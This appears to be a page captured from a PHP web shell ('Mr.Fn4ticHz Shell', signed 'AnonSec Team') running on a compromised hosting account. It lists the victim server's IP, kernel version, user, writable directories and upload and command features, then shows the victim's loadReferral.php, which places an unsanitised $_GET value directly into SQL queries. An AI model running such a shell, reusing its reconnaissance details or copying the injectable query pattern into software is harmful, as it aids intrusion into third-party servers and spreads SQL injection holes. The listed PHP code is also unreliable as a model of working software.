Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.118.144.248
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/loadReferral.php
<?php 
	include("dbconnection.php");
		session_start();
		$DisplayForm=True;
$sql7 ="select * from admin where id='$_GET[drid]'";
$qsql7 = mysqli_query($con,$sql7);
if($rs7 = mysqli_fetch_array($qsql7))
{
    $DisplayForm=False;
echo "";
}
if(!$DisplayForm)
{
?>
<?php
session_start();
include('dbconnection.php');
$sql ="select * from admin where id='$_GET[drid]'";
$qsql = mysqli_query($con,$sql);
while($qsql2=mysqli_fetch_array($qsql))
{
echo" <table id='example2' class='table table-bordered table-hover' width='100%'><tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Referral to: </td>
<td width='50%'>
 $qsql2[hsname]
 </td>
 </tr>
  <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Location: </td>
<td width='50%'>
$qsql2[Selectdistrict],&nbsp; $qsql2[Selectstate],&nbsp; $qsql2[Pincode]
 
 </td>
 </tr>
   <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Phone: </td>
<td width='50%'>
 $qsql2[numbers]
  </td>
 </tr>
  <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Email: </td>
<td width='50%'>
 $qsql2[EmailID]
  </td>
 </tr>

";
}
?>


<?php
}
?>



<?php 
	include("dbconnection.php");
		session_start();
		$DisplayForm=True;
$sql7 ="select * from admin where id='$_GET[drid]'";
$qsql7 = mysqli_query($con,$sql7);
if($rs7 = mysqli_fetch_array($qsql7))
{
    $DisplayForm=False;
echo "";
}
if($DisplayForm)
{
?>
<table id='example2' class='table table-bordered table-hover' width='100%'>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Location: </td>
<td width='50%'><input type='text' name='location' placeholder='Location'>
</td>
 </tr>
   <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Phone: </td>
<td width='50%'>
<input type='text' name='Phone' placeholder='Phone'>
  </td>
 </tr>
  <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Email: </td>
<td width='50%'>
 <input type='text' name='Email' placeholder='Email'>
  </td>
 </tr>
</table>
<?php
}
?>




Anon7 - 2022
AnonSec Team